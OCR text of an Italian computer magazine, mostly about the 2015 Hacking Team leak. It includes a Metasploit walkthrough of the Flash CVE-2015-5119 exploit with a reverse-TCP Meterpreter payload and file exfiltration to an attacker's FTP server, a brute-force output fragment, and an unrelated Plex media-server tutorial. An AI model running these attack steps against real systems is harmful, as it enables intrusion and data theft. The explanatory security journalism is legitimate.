pronti a gestire la grande molte di dati spiati, 
specie se si pensa che, con Galileo, un singolo 
individuo poteva controllare fino a centomila 
dispositivi. Capito perché viene difficile pensare 


che l’attacco all’Hacking Team possa essersi 
basato solo su una password troppo semplice? 

Software all’avanguardia 

A questo punto, molti potrebbero continuare a 
ignorare la potenza di software come Galileo, e 
le conseguenze di quanto accaduto all'azienda 
milanese, bollando il tutto come robaccia da 
nerd. Non è così. Intendiamoci: non c'è nessuna 
ragione per credere che un software di questo 
tipo, costoso e comunque difficile da maneg¬ 
giare (una fornitura, fatture alla mano, poteva 
superare anche il milione di euro), metta in 
pericolo la sicurezza di un semplice cittadino. 
Quel che tuttavia è certo è che un trojan come 
quello di Hacking Team è raffinato quanto basta 
per colpire potenzialmente chiunque. E con 
chiunque, e questo sì dovrebbe interessare il 
comune cittadino, intendiamo politici, capi di 
stato, piani alti di enti militari e aerospaziali, 
colletti bianchi del mondo della finanza. Se l’uti¬ 
lizzo di Galileo, così come altri software dello 
stesso tipo, fosse limitato a ragioni di sicurezza, 
secondo un’etica e parametri di controllo pre¬ 
cisi, probabilmente non ci sarebbe motivo per 
preoccuparsi. Dopotutto sono questi software, 
piaccia o non piaccia, ad avere un ruolo prima¬ 
rio neH'anti-terrorismo. Tuttavia, la vicenda 
Hacking Team mostra una realtà amara: un 
troj an è, a tutti gli effetti, un malware, e non c’è 
modo di utilizzare un malware solo per scopi 
lodevoli. È nella sua natura essere dannoso, o 
forse è nella sua natura indurre in tentazione 
chi ne ha il controllo. Le conseguenze di questa 
vicenda sono incalcolabili. Da una parte, chi 
utilizza (o utilizzava) il Remote Control System 
per scopi benevoli, ora dovrà cambiare strate¬ 
gia perché gli obiettivi "cattivi" sanno come 
difendersi. Dall'altra, chi lo utilizzava per scopi 
meno nobili, da questa vicenda ha imparato a 
coprire meglio le proprie attività e a tutelarsi 
anche nel caso in cui queste siano esposte alla 
gogna pubblica. Difficile stabilire, in questa 
storia, chi sia davvero il cattivo. 


NON SIAMO SOLI 

Hacking Team non è l'unica azienda specializzata in 
questo genere di software "oscuro". E non parliamo 
solo di soluzioni per lo spionaggio, ma anche di 
programmi per difendersi da queste. Un esempio 
è ReaQta, con sede in Malta e aperta, guarda caso, 
da Alberto Pelliccione, un ex di Hacking Team. E poi 
MALA s.r.l., di stanza a Torino e fondata da un altro 
ex dell'azienda milanese, ossia Guido Landi. 
Poi ci sono le tedesche AGT e FinFisher, 
quest'ultima la vera concorrente del team 
diVincenzetti;eTe4i, con sede a Dubai ma 
fondata sempre da italiani. 
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Provato il tool buca-Flash che entra in qualunque computer, 
in barba agli antivirus, ai firewall e a tutti i tool di sicurezza 


L I eco del "datagate" del 2013 non si è 
9 ancora spento, Edward Snowden 
I è tuttora considerato un paladino 
della libertà dagli utenti ed un traditore 
dal Governo Statunitense. L’idea che 
agenzie governative come l’NSA abbia¬ 
no esagerato nella loro paranoica caccia 
ai nemici dell’occidente, controllando 
milioni di utenti senza che alcun tribu¬ 
nale avesse autorizzato intercettazioni 
di alcun tipo, è ormai affermata. Quello 
che non sapevano, almeno non con 
certezza, fino a qualche settimana fa era 
che le agenzie governative non erano 
sole in questo lavoro: diversi governi 
si sono avvalsi dei servizi di alcune 
aziende per compiere le azioni di sor¬ 
veglianza. Insomma, lo stereotipo delle 
squadre di esperti di sicurezza informa¬ 
tica assoldati da un qualsiasi governo e 
messi a lavorare in un bunker sotterra¬ 
neo per attaccare computer dei presunti 
“nemici" non era del tutto completo: in 
questa immagine mancavano le azien¬ 


de di sicurezza informatica, disposte a 
svolgere lo stesso lavoro in cambio di 
denaro e per governi diversi (spesso, 
governi in lotta tra loro). Queste aziende 
sono, in un certo senso, i trafficanti di 
armi della guerra cybernetica. 

Da Milano con successo 

Nelle pagine precedenti abbiamo par¬ 
lato di Hacking Team, un'azienda ita¬ 
liana con sede a Milano che è una delle 
principali nel settore della sicurezza 
informatica. HackingTeam è diventata 
famosa quando un gruppo di attivisti 
per la libertà di informazione ha deciso 
di pubblicare su WikiLeaks una serie 
di documenti riservati per un totale di 
circa 400 GB di dati riservati con infor¬ 
mazioni di ogni tipo che dimostrano la 
vendita da parte dell’azienda a governi 
di tutto il mondo, inclusi quelli che non 
rispettano le libertà civili (tra i quali il 
Sudan, che è al momento sotto embargo 
ONU), di un programma di propria pro¬ 


duzione chiamato Remote Control Sy¬ 
stem. Tale strumento consente, tramite 
lo sfruttamento di alcuni bug scoperti 
dalla stessa HackingTeam e mai resi 
pubblici, di assumere il controllo di 
qualunque computer. Naturalmente, 
nessuno degli affari di HackingTeam 
era illegale, anzi: l’azienda si è premura¬ 
ta di lavorare sempre nell’ambito della 
legislazione europea. L’unica eccezione 
riguarda una fattura, trovata tra le varie 
e-mail, di 960.000 euro pagata dai ser¬ 
vizi segreti del Sudan: gli esperti stanno 
ancora cercando di capire se questa 
vendita possa essere considerata una 
violazione dell'embargo ONU nei con¬ 
fronti della dittatura del paese africano. 

Più exploit per tutti 

Ma scoprire il giro d’affari dell’azienda 
milanese non è l’unico punto di inte¬ 
resse dello studio dei dati trafugati dai 
server di HackingTeam. Per chi si oc¬ 
cupa di sicurezza informatica, infatti, 



NON È SOLO 
SPIONAGGIO 

Alcune e-mail indicano 
rapporti commerciali 
di HackingTeam con 
aziende di vario tipo, 
tra cui anche assicu¬ 
razioni e banche. Tut¬ 
tavia, non sappiamo 
quali servizi tali azien¬ 
de abbiano acquistato: 
non è detto che si tratti 
di sistemi per spiarei 
clienti, potrebbe invece 
trattarsi di semplici 
test per la sicurezza dei 
loro database. 



LEGGI 

— 

SUL WEB 


COSI SCOPRI SE SEI SPIATO DAL SOFTWARE 
DI HACKINGTEAM 


Da noi interpellato, l'esperto di sicurezza Raoul Chiesa ha spiegato 
che esiste uno strumento per capire se il proprio computer è stato 
infettato dallo spyware di HackingTeam. Questo strumento si 
chiama Detekt (lo trovi nella sezione Antivirus&Sicurezza del Win 
DVD-Rom) ed è stato rilasciato grazie al supporto di organizzazioni 
come Amnesty International. Per utilizzare il programma è consi¬ 
gliabile scollegare il proprio computer da Internet e disabilitare 
temporaneamente l'antivirus (finché non si completa il test). Una 
procedura guidata all'avvio del programma consente di iniziare 
facilmente il test, che può richiedere fino a 30 minuti. Nel caso 
venga rilevato uno spyware, è possibile tentare di eliminarlo con un 
programma come Spybot (lo trovi nella sezione Antivirus&Sicurezza 
del Win DVD-Rom), ma sarebbe consigliabile ripristinare lo sta¬ 
to del computer a quello iniziale. Infatti, secondo i Trendlabs di 
TrendMicro, HackingTeam eseguiva anche delle modifiche al BIOS 


UEFI preinstallato su molti modelli di schede madre per consentire 
al proprio spyware di rimanere invisibile ai software di controllo 
installati nel PC delle vittime. 


Drlrfct 

<!]> DETEKT 
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https://archive.is/n0om8 

Il pirata che ha crackato le 
e-mail di HackingTeam è 
riuscito anche ad entrare 
nel loroaccountTwitter 
ufficiale e lo ha utilizzato 
defacciandolo per annun¬ 
ciare le proprie azioni. 
Oggi la pagina Twitter 
è memorizzata sul sito 
archive.is. 
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l'obiettivo primario è scoprire quanti più dettagli 
possibili sul software Remote Control System 
e sugli spyware sviluppati dall’azienda mila¬ 
nese, oltre che sui vari bug che ha scoperto nei 
principali programmi di uso comune. Infatti, 
comprendendo il loro funzionamento, è possi¬ 
bile sviluppare delle soluzioni. Non è un caso 
che nelle settimane successive alla divulgazione 
delle informazioni riservate sia stata rilasciata 
una valanga di aggiornamenti per Windows, 
Flash e molti altri software usati dalla maggio¬ 
ranza degli utenti: sono tutti tentativi di argi¬ 
nare le falle tramite cui HackingTeam riusciva 


a penetrare i computer di qualsiasi utente. C’è 
però un problema: se le caratteristiche di questi 
bug sono pubblicamente disponibili significa 
che possono accedervi non solo i progettisti di 
antivirus e quelli dei programmi “buggati", ma 
anche i pirati informatici interessati a sfruttare 
gli exploit di HackingTeam per commettere 
azioni criminali. In altre parole, fino a qualche 
settimana fa soltanto i clienti di HackingTeam, 
che avevano preso accordi con tale azienda e 
l’avevano pagata per i suoi "servizi", potevano 
utilizzare gli exploit contenuti nel programma 
RCS per accedere al computer di un qualsiasi 


utente. Ora, invece, chiunque può copiare il 
codice sorgente dei vari exploit e utilizzarlo 
per i propri scopi. Uno dei primi bug ad esse¬ 
re scoperti è stato quello di Flash, noto con il 
nome CVE-2015-5119 (www.winmagazine.it/ 
link/3214). Questo bug, presente in tutte le ver¬ 
sioni di Flash dalla 9 in poi, ovvero circa il 50% di 
tutti i computer del mondo, potrebbe consentire 
ai pirati un accesso remoto al sistema operativo 
dell’utente vittima. Ottenuto il terminale remoto 
è poi possibile installare sul sistema della vittima 
uno spyware capace di fornire loro il controllo 
remoto del sistema in un qualsiasi momento. 


Così funziona l’exploit di Flash 

Uno dei bug più pericolosi tra quelli utilizzati da Hacking Team riguarda il componente per browser Flash 
Player. Grazie al tool di penetration test Metasploit siamo in grado di capire nei dettagli come funziona. 



^ Caricare l'exploit 

Avviato il terminale di Metasploit con il 
comando msfconsole, il pirata deve pri¬ 
ma di tutto indicare quale exploit intende utilizza¬ 
re. Per scegliere quello basato sulla vulnerabilità 
di Flash deve dare il comando use exploit/multi/ 
browser/adobe_ flash_ hacking_ team_ uaf. 
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È arrivata una vittima 

^ Appena sulla console Metasploit del 
pirata appare il messaggio di apertura 
di una sessione Meterpreter, il pirata “ha vinto”. 
Gli basta infatti scrivere il comando sessions 
-/' 1 per ottenere un terminale con accesso al 
sistema vittima. 
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+ Quale pavload usare 

Il pirata opta per il classico setpayload 
windows/meterpreter/reverse_ tcp. Poi, 
il comando show options indica al pirata quali 
siano le opzioni da specificare: le più importanti 
sono Ihoste srvhost, che vanno impostate con 
l’IP del pirata. 


-M option) 
rted protocols) 
nput (-U for modùle help) 

vs firebird ftp ftps http[s]-{head|< 
m icq imap[s] ire Tdap2[s] ldap3[-{< 
oracle-sid pcanywhere penfs pop3[s] 
p-enum snmp socks5 ssh sshkey svn tu 


lairs - usage orfly allowed 


-a I comandi del pirata 

Tramite Meterpreter, il pirata può ottene¬ 
re informazioni sul sistema operativo del¬ 
la vittima. Usando il comando shed può aprire 
un prompt dei comandi. Da qui il pirata può fare 
qualsiasi cosa, per esempio leggere i file con il 
comando dir. 



^ La pagina HTML piratata 

2 II comando exploit\ie rifica che le condizioni 
siano adatte e poi avvia il server Web con 
una pagina HTML apparentemente bianca conte¬ 
nente il codice malevolo. Nella console apparirà il 
link che il pirata deve rendere pubblico: qualcosa 
del tipo http://www.nomedominio.com/GUkbkX/. 


io.txt -e ns -f -V 192.168.0.128 htt 
- for legai purposes only 

.-03-05 15:48:42 
try per task 

. "admin" - 1 of 9 [child 0] 

: "" - 2 of 9 [child 1] 

. "luigi” - 3 of 9 [child 2] 

; "carmelo" - 4 of 9 [child 3] 

; "paolo" - 5 of 9 [child 4] 

; "ciccio" - 6 of 9 [child 5] 

. "vincendo" - 7 of 9 rchild 61_ 


^ Controllo assoluto 

Quando il pirata trova qualcosa di inte¬ 
ressante, lancia il comando ftp server, 
com per collegarsi al suo server FTP. Con il 
comando put C:\Users\utente\file.jpg /file.jpg 
il pirata invia al proprio server il file e i docu¬ 
menti che desidera sottrarre. 
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IL CASO HT ANALIZZATO DA RAOUL CHIESA 


Sul caso di Hacking Team abbia¬ 
mo chiesto un autorevole pare¬ 
re al più famoso hacker italiano, 
esperto di sicurezza informati¬ 
ca. Ecco cosa ci ha raccontato. 
Il leakdi HackingTeam, oramai eti¬ 
chettata in tutto il mondo come Ha- 
ckedTeam, credo vada considerato 
come uno degli incidenti più gravi nel 
settore delle cosiddette Lawful interceptions (le intercettazioni legali), una 
sorta di pietra miliare: tutto cambierà, tutto sarà diverso, da ora in poi. Ho de¬ 
finito la violazione, sottrazione e pubblicazione dei dati (il "leak") un incidente 
tremendo, per diverse ragioni. 

• In primo luogo, il codice sorgente dei trojan di HackingTeam è ora dispo¬ 
nibile a chiunque, in primis proprio a quei soggetti i quali erano oggetto di 
interesse ed intercettazione da parte dei clienti dell'azienda (tipicamente, 
governi, forze dell'ordine e forze speciali, agenzie di intelligence). 

• In seconda istanza, tutte le comunicazioni interne (e-mail) dell'azienda, sia tra 
colleghi che da e verso i clienti, sono ormai pubbliche. Un danno immenso, 
specialmente leggendo con attenzione alcune discussioni decisamente par¬ 
ticolari, così come il tono e le parole utilizzate verso alcuni soggetti e clienti. 

• Come terzo punto, l'elenco stesso dei clienti. Quello del Lawful Interception 
è un mercato nel quale la riservatezza è tutto, un aspetto peraltro comune a 
tutto il mondo dell'lnformation Security. E qui abbiamo un secondo preoc¬ 
cupante risvolto di tutta la faccenda, certamente quello che si è rivelato il più 
catastrofico per HackingTeam: l'apparente dimostrazione, apparenti prove ed 
evidenze di aver venduto (o, quantomeno, intrapreso tentativi di prevendita) 
ai cosiddetti "Paesi canaglia" a regimi oppressivi e certamente discutibili, le 
loro soluzioni. 

Proprio gli aspetti legati al mondo dell'lnformation Security rappresentano un 
ulteriore punto di discussione. HackingTeam, infatti, aveva deciso sin dall'inizio 
di offrire anche servizi di penetration testing e verifica delle vulnerabilità ai 


suoi clienti. Ora, non c'è incubo peggiore per un'azienda che il vedere i report 
di questi test a disposizione di tutti: elenchi di vulnerabilità, password, tutti 
i "segreti" (spesso anche non belli), esposti al mondo intero. In questo caso, 
l'elenco dei clienti i cui report sono ora liberamente scaricabili è lunghissimo: 
partiamo dall'ABI (l'Associazione Bancaria Italiana) e proseguiamo con UbiBanca, 
Generali, Unipol, Cattolica, CnpCapitalia, Fondiaria SAI, Itas Assicurazioni, oltre 
a ING Direct, Deutsche Bank, Barclays, RSAe Axa. E poiTIM e Alenia Aermacchi. 
Da quanto accaduto si possono quindi trarre una serie di lezioni: 

I Come ripeto da anni i confini, una volta netti e distinti, tra il mondo dell'ha- 
cking e del digitai underground, il cybercrime, il cyber Espionage, l'in- 
formation warfare e il cosiddetto "controllo dell'informazione" sono oramai 
vacui, grigi, quasi senza distinzioni.Tutto ciò, come ha dimostrato per primo 
lo scandalo della NSA e le rivelazioni di Edward Snowden (il quale, come mio 
parere personale, andrebbe insignito del premio Nobel per la Pace, come ho 
detto pubblicamente più volte), è pericoloso, molto pericoloso. 

2 È inammissibile che un'azienda operante in specifici settori (qui mi riferisco 
nello specifico alle verifiche di sicurezza, i penetration test insomma) non 
abbia i propri archivi su server cifrati e scollegati (off-line), quindi non accessibili 
remotamente. Inoltre, non vi è alcun bisogno di"tenere"i report di clienti per 
così tanti anni (alcuni dei leakerano risalenti addirittura al 2006/2008; teniamo 
inoltre presente come HackingTeam abbia smesso di erogare questo servizio 
circa 2-3 anni fa, in quanto il team che li eseguiva si è distaccato dall'azienda 
madre e ha aperto una propria società). 

3 In un settore, un mercato "grigio" ci sono comunque delle regole che vanno 
rispettate. Questo, a quanto sembra alla data in cui scrivo, non è successo. Si 
è arrivati ad una situazione di onnipotenza eccessiva, pazzesca, non accettabile, 
che ha portato - direttamente o indirettamente - a tutto questo. 

Bisogna fare attenzione e non dimenticare mai che si parla di persone, non 
solo di tecnologia. Viviamo in un mondo totalmente on-line, e dipendiamo 
sempre più dall'lnformation Technology: tutto questo non è un gioco. Come 
disse una grande mente della storia: "da una grande conoscenza derivano 
grandi responsabilità". 


I TOOL DI SPIONAGGIO IN CHIARO SU GOOGLE 


I dati riservati di HackingTeam e le e-mail scam¬ 
biate dai dirigenti dell'azienda milanese con i 
loro clienti sono state pubblicate inizialmente 
su WikiLeaks, ma è piuttosto scomodo scaricarle 
da tale sito, perché è necessario selezionarle una 
alla volta. Il pirata che ha cracckato i profili degli 



Tutti i sorgenti delle vulnerabilità sfruttate 
da HackingTeam sono state pubblicate on-line, 
a disposizione di qualunque pirata informatico 
volesse approfittarne per attaccare i nostri PC! 


amministratori di sistema di HackingTeam ha 
però caricato tutto il materiale rubato nella rete 
torrent (http://infotomb.com/eyyxo.torrent) e su 
un server HTTP (https://ht.transparencytoolkit. 
org). Attenzione, però: ricordiamo che i download 
torrent non sono anonimi, quindi se scarichiamo 
questo file potremo essere facilmente identifica¬ 
bili. Naturalmente, molti curiosi stanno scaricando 
questi messaggi senza curarsi troppo delle con¬ 
seguenze legali.Tuttavia è importante ricordare 
che esiste anche un ulteriore problema: quello 
della gestione della gran mole di dati. Infatti, per 
riuscire a trovare qualcosa in oltre 400 GB di dati è 
necessario utilizzare strumenti statistici per isolare 
le informazioni importanti da quelle irrilevanti e 
per collegarle tra di loro. 

IL CODICE SORGENTE DI RCS 

Il programma RCS, inoltre, sta finendo su GitHub 
(www.winmagazine.it/link/3216). Diversi pirati 


informatici, infatti, leggendo le e-mail pubblicate 
su WikiLeaks ed i vari file ad esse allegati, sono 
riusciti a ricostruire parte della suite RCS. Al mo¬ 
mento, naturalmente, il software è incompleto, e 
di fatto inutilizzabile.Tuttavia, si può immaginare 
che nel giro di qualche mese l'intero RCS verrà 
ricostruito e sarà perfettamente operativo. In quel 
momento, chiunque sarà in grado di utilizzarlo 
per attaccare un qualsiasi sistema informatico. 
L'unica soluzione consiste nella speranza che i 
produttori di software, come Adobe, Microsoft 
ed Apple correggano i bug nei loro programmi 
prima che i pirati riescano ad utilizzare gli exploit 
di HackingTeam. Naturalmente, è fondamentale 
che tutti gli utenti mantengano aggiornati i propri 
computer, in modo da prevenire questo tipo di 
minacce. Un po'come per un vaccino: se le azien¬ 
de rilasceranno degli aggiornamenti risolutivi in 
breve tempo, sarà possibile eradicare il problema, 
rendendo RCS di fatto inutile. ■ 
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Trasforma il PC in un’emittente TV 
che trasmette film e serie TV on- 
demand a tutti i tuoi dispositivi 


Cosa ci ' —1 
occorre ™ LE 


SERVER MULTIMEDIALE 

PLEX MEDIA 
SERVER 


Lo trovi su: S?DVD 
Sito Internet: 

www.plex.tv 

CHIAVETTA ANDROID 

GOOGLE 

CHROMECAST 

Quando costa: € 35,00 
Sito Internet: 

www.winmagazine. 
it/link/3154 


I l nostro è senza dubbio il secolo dove esse¬ 
re connessi tecnologicamente gli uni con 
gli altri è divenuta l'esigenza primaria di 
buona parte della civiltà occidentale (e non 
solo). La diffusione dei telefoni cellulari alla 
fine del secolo scorso è stata propedeutica a 
ciò che da lì a breve si sarebbe trasformata in 
una rete di connessioni utile a far comuni¬ 
care fra loro non solo le persone ma anche i 
dispositivi elettronici che oggi sono in grado 
di consigliarti se prendere l’ombrello prima 
di uscire di casa e persino di rimproverarti 
se stai lavorando troppo! 

Dispositivi intelligenti 

La capacità di un dispositivo di ricevere 
informazioni e istruzioni da un altro di¬ 
spositivo e agire di conseguenza è oggi un 
requisito fondamentale per conquistare la 
definizione di “smart”. Ecco quindi entrare 
nelle nostre case gli smartphone, gli smar- 
twatch, le smart TV e via discorrendo: og¬ 
getti che non si limitano a svolgere il ruolo 
al quale sono principalmente destinati, ma 
che sono in grado di interfacciarsi fra loro 
per assicurare ai loro utilizzatori un'espe¬ 
rienza di utilizzo che qualche tempo fa era 
semplicemente impensabile. In tempi non 
troppo lontani per vedere un film scaricato 
da Internet sul televisore eravamo costretti 
ad acquistare delle interfacce in grado di 
convertire il segnale VGA e trasferirlo alla 
presa SCART della TV. In alternativa c'era la 
masterizzazione sul classico DVD o il piccolo 
schermo del computer. Qualche tempo dopo, 
una piccola rivoluzione tecnologica ha im¬ 
messo sul mercato nuove apparecchiature 
in grado di leggere buona parte dei formati 
multimediali e trasferirli sul televisore senza 
che fosse necessario collegare un computer: 
tra questi, le Smart TV con gli ingressi USB 
che potevano connettersi in rete e i lettori 
Blu-ray compatibili con un numero sempre 
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1 Una emittente TV personale 

Scopriamo la procedura per installare sul PC Plex TV, da noi ribattezzato Cinema Media Server. Al termine 
potremo avviarlo per trasmettere tutti i nostri contenuti in streaming ai computer della rete LAN. 





^ Subito pronto all’uso 

Scompattiamo l’archivio compresso PlexTV. 
zip che troviamo nella sezione Internet del 
Win DVD-Rom ed eseguiamo con un doppio clic sul 
file eseguibile contenuto al suo Interno la semplice 
procedura guidata di installazione. Al termine cuc¬ 
chiamo sul pulsante Launch. 


jk Le librerie multimediali 

Seguiamo la procedura guidata di configu¬ 
razione accettando i termini di servizio. Dia¬ 
mo un nome al server e nella schermata successiva 
clicchiamo Aggiungi libreria per iniziare a creare le 
nostre personali playlist scegliendo tra Film, Serie 
TV, Musica, Foto e Home Videos. 


^ Contenuti a portata di clic 

Associamo a ogni playlist la cartella con i 
contenuti cliccando su Browser formedia 
folder( all'occorenza possiamo indicare anche più 
cartelle per ogni singola playlist). Terminiamo la cre¬ 
azione guidata cliccando Aggiungi libreria e confer¬ 
mando le schermate successive. 



L 
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-x Pratica interfaccia Web 

^ Raggiungiamo di nuovo il pannello di ammi¬ 
nistrazione del server cliccando col tasto 
destro sull'icona di Plex nella System tray di Win¬ 
dows. Selezioniamo la voce Media manager, il brow- 
ser si aprirà nuovamente mostrando l’interfaccia di 
Plex e i primi contenuti aggiunti. 


-x Cosa vuoi riprodurre? 

Clicchiamo sull'icona delle impostazioni in 
alto a destra e verifichiamo che sia selezio¬ 
nata la schermata WEB. Selezioniamo la voce Ripro¬ 
duttore e regimo le impostazioni di qualità locale e 
remota (e cioè quale bitrate deve usare il server per 
ricodificare i contenuti da riprodurre). 


^ Iniziamo le trasmissioni 

Dopo aver completato la configurazione 
_ accediamo al nostro Cinema Media Server 
aprendo il browser in qualsiasi PC della rete locale 
e digitando http://nomePC:32400/web/index.html 
nella barra indirizzi, sostituendo a nomePC IIP del 
computer su cui è installato Plex. 


crescente di codec, per non parlare dei Media 
Box, degli hard disk multimediali ed infine 
dei media server. Il dominio dei DVD e dei 
supporti in genere era destinato a finire e 
neanche l'avanzata di un nuovo standard, il 
Blu-ray, avrebbe cambiato le cose: le persone 
avevano imparato a ignorare il mercato dei 
supporti rinunciando aH’altissima defini¬ 
zione e all’audio multicanale, a favore di file 
che potevano essere riprodotti sul televisore 
senza troppi "traffici". 

L’evoluzione della specie 

Nell’ambito dei media server la prima gran¬ 
de rivoluzione è stata segnata dall’arrivo del 


DLNA, uno standard di trasmissione che 
permetteva a dispositivi diversi tra di loro 
di dialogare anche via wireless e comunque 
all’interno della rete locale dove un server 
(che deteneva i contenuti) si incaricava di 
trasmettere un flusso video (uno stream) ad 
un client nella maniera più efficiente possi¬ 
bile. Mentre Apple costruiva il suo sistema 
proprietario, AirPlay, l'idea dei server mul¬ 
timediali si sviluppava superando il diffuso 
ma limitato DLNA. Tra i nomi più illustri 
segnaliamo il progetto open source XBMC/ 
Kodi e il più famoso Plex (da noi battezzato 
come Cinema Media Server), un tool che 
grazie ad un’architettura multipiattaforma e 


ad un'interfaccia di navigazione innovativa, 
è diventato uno standard utilizzabile su 
qualsiasi dispositivo (persino il Raspberry 
Pi). Con Plex potremmo controllare il cata¬ 
logo multimediale dal cellulare ed utilizzare 
Chromecast per vedere il nostro film della 
sera sul 50 pollici del salotto e come instal¬ 
lare il medesimo client anche sulle console 
di gioco e sul mini computer Raspberry. E 
nel caso in cui la nostra aspirazione fosse 
quella di creare una rete televisiva tutta 
nostra, impareremo anche ad attivare l’ac¬ 
cesso remoto a Plex per invitare gli amici a 
sfogliare il nostro catalogo direttamente 
da Internet. ► 
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PLEXANCHE 
SULNAS 


Nel caso di installazione 
su NAS, dobbiamo 
tener presente che non 
basterà un dispositivo 
a buon mercato in 
quanto il server utilizza 
la CPU (che nei NAS non 
è molto generosa) per 
ricodificare i file. Una 
volta installata l'appli¬ 
cazione è sufficiente 
configurare il server e 
le librerie di contenuti 
esattamente come 
nell'ambiente Windows 
e cioè direttamente dal 
browser, con la differen¬ 
za che il server Plex in 
questo caso risiede su 
un dispositivo diverso 
dal nostro PC. 


UNA SEMPLICE INTERFACCIA WEB ORIENTED 

La schermata principale di Plex è accessibile da qualsiasi browser e permette non solo di riprodurre i contenuti 
ma anche di configurare e personalizzare ogni aspetto del server. 
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a ATTIVITÀ 

Mostra le attività trascorse 
e presenti sul server Plex, 
inclusi i contenuti che 
vengono riprodotti e i 
dispositivi sui quali sono 
trasmessi 

B IMPOSTAZIONI 

Permette di configurare 


l’interfaccia Web del 
programma, le impostazioni 
del server, aggiungere utenti 
e amici ed infine verificare i 
dispositivi collegati 

B PULSANTE DI 
RIPRODUZIONE 

È possibile inviare a 
Cliromecast il contenuto 


che richiediamo per 
poterne poi controllare la 
riproduzione mediante il 
telecomando del televisore 

B ACCOUNT 

Permette di accedere alla 
configurazione dell’account, 
impostare un PIN per 
l’accesso all’interfaccia di 


Plex, visualizzare i contenuti 
già visti o quelli che 
dobbiamo ancora vedere 

Q LIBRERIE 

Il pulsante + permette di 
aggiungere al server le 
cartelle del nostro hard disk 
dove prelevare i contenuti 
multimediali, ordinandoli per 


Film, Spettacoli TV, Musica, 
Foto, Home Videos 

EX HOME 

In ogni momento 
possiamo tornare alla 
pagina principale dove 
sono elencati tutti i 
contenuti disponibili per la 
riproduzione 


Guardiamo i nostri film in TV grazie 


La semplice modalità grafica di Plex può essere facilmente comandata anche dal nostro smartphone e permette 
di gestire i video trasmessi sul televisore di casa al quale è collegata la chiavetta multimediale di Google. 



^ Coll e gamento in corso 

Dallo smartphone Android avviamo il Play 
Store e cerchiamo l'app Plex for Android rila¬ 
sciata da Plex, Ine.: tocchiamo Installa e poi Accetto 
per avviare la semplice installazione. Al termine, log- 
ghiamocl al nostro account Plex e scegliamo dal menu 
in alto il server al quale collegarci. 
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^ La giusta qualità video 

Apriamo il menu deH’applicazione e tappiamo 
Impostazioni e poi su Video. Qui definiamo la 
qualità con la quale il server ricodificherà i nostri file: 
lasciamo le impostazioni di default se abbiamo una 
ADSL a 8 Mbps. È possibile definire il bitrate per la 
rete mobile in caso di fruizione “fuori casa”. 



^ Scegliamo il film da vedere 

Raggiungiamo nuovamente il menu e selezio¬ 
niamo una categoria (ad esempio TVShowd). 
Nella schermata che segue tappiamo sui contenuto 
di nostro piacimento. Alcuni contenuti, come le serie 
TV, vengono raggruppate per episodi (un numero sulla 
locandina indica gli episodi disponibili). 


54 Win Magazine Speciali 




















Cinema in HD a costo zero | Fai da te 


Così fa l'hacker O 


] Usiamo Plex anche da remoto 

Aprendo le necessarie porte di comunicazione sul router, possiamo accedere a Plex e a tutti i nostri contenuti 
multimediali anche al di fuori della rete locale utilizzando lo smartphone o il tablet. 



x. Il canale di comunicazione 

Accediamo alle impostazioni di Plex raggiun¬ 
gendo la scheda Server. Sulla sinistra sele¬ 
zioniamo la voce Remote Access. Qui annotiamo il 
numero di porta 32400 utilizzata dal server di Plex. 
All’occorrenza, possiamo variarlo con quello che rite¬ 
niamo più adatto alle nostre esigenze. 



x. Apriamo le porte del router 

Nelle impostazioni del router attiviamo un Port 
forwarding di porte (la procedura può varia¬ 
re a seconda del modello) attivando sul nostro indi¬ 
rizzo IP (impostato come statico usando un servizio 
come www.noip.com) un inoltro automatico dalla porta 
esterna 32400 a quella interna 32400, 
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x. Accesso consentito 

Attiviamo quindi l’accesso remoto del server 
Plex che ci confermerà la sua disponibilità con 
la frase Accessibile dall’esterno della tua rete. Cuccan¬ 
do sul pulsante Mostra avanzate annotiamo l'indiriz¬ 
zo IP pubblico attivo e comunichiamolo a chi desidera 
accedere da remoto al server. 
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-x Inizia la visione 

^ Nel caso di un filmato multilingua possiamo 
scegliere la lingua della traccia audio e persi¬ 
no i sottotitoli (là dove questi siano, ovviamente, dispo¬ 
nibili). Per vedere il contenuto cucchiamo sul pulsante 
Riproduci e attendiamo che il contenuto venga ripro¬ 
dotto nel nostro smartphone. 


x. Colleglliamoci a Chromecast 

Per visualizzare il contenuto sul televisore tra¬ 
mite la chiavetta Google accendiamo la TV e 
posizioniamoci sul canale corrispondente. Tappiamo 
quindi sull'icona in alto a destra che diventerà visi¬ 
bile non appena lo smartphone rivelerà la chiavetta 
multimediale e poi selezioniamo il nostro dispositivo. 


x. Usiamo il telecomando 

0 II video in riproduzione sul cellulare si inter¬ 
romperà mostrando solo la locandina, men¬ 
tre il filmato verrà trasmesso sul televisore. A que¬ 
sto punto possiamo utilizzare le funzioni di pausa e di 
riproduzione sul telecomando del televisore per con¬ 
trollare il contenuto. 
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(BK Cinema anche sulle console 


VA BENE ANCHE 
IL RASPBERRY 


Sui mini computer 
Raspberry, Plex è dispo¬ 
nibile solo come cliente 
perdi più non ufficiale. 
Tuttavia fa benissimo il 
suo lavoro e permette di 
ottenere un'esperienza 
molto simile a quella 
dell'applicazione ori¬ 
ginale. A questo si ag¬ 
giunga che l'applicazio- 
ne RasPlex in questione 
è completamente 
gratuita ed è scaricabile 
dal sito ufficiale www. 
rasplex.com. 


VISIONI SENZA 
INTERRUZIONI 


Entrando su qualsiasi 
contenuto nell'Inter¬ 
faccia principale di Plex 
ed utilizzando il terzo 
pulsante sulla sinistra, 
possiamo creare delle 
mini-playlist che dif¬ 
feriscono dalle macro 
categorie Film, Home 
Video ecc. in quanto cre¬ 
ate manualmente con 
lo scopo di raccogliere 
più contenuti da far 
riprodurre in sequenza. 
Possiamo creare infinite 
playlist che saranno poi 
rese disponibili su tutti i 
dient collegati al nostro 
server. 


Il catalogo di Plex è accessibile in modalità grafica anche su PS3 (tramite DLNA) e Xbox. In 
quest’ultimo caso occorre usare l’app ufficiale e sottoscrivere un Plex Pass. Ecco come fare. 



^ Accediamo a Plex da PS3 

Dopo aver avviato la console Sony Playstation 3 accediamo 
alla schermata principale navigando fino alla voce Video 
oppure Foto. Qui troveremo il nostro Plex Server. Selezioniamolo 
premendo il tasto Xsul joypad. 



Navigare tramite il protocollo DLNA 

2 La navigazione del catalogo sul server Plex avviene via 
DLNA ed è strutturata secondo cartelle nominate come le 
nostre playlist, con la differenza che queste ultime utilizzano una 
nomenclatura in lingua Inglese facilmente comprensibile. 




Installiamo Plex sulla Xbox 

Accediamo al nostro accountXbox Live usando il gamertag 
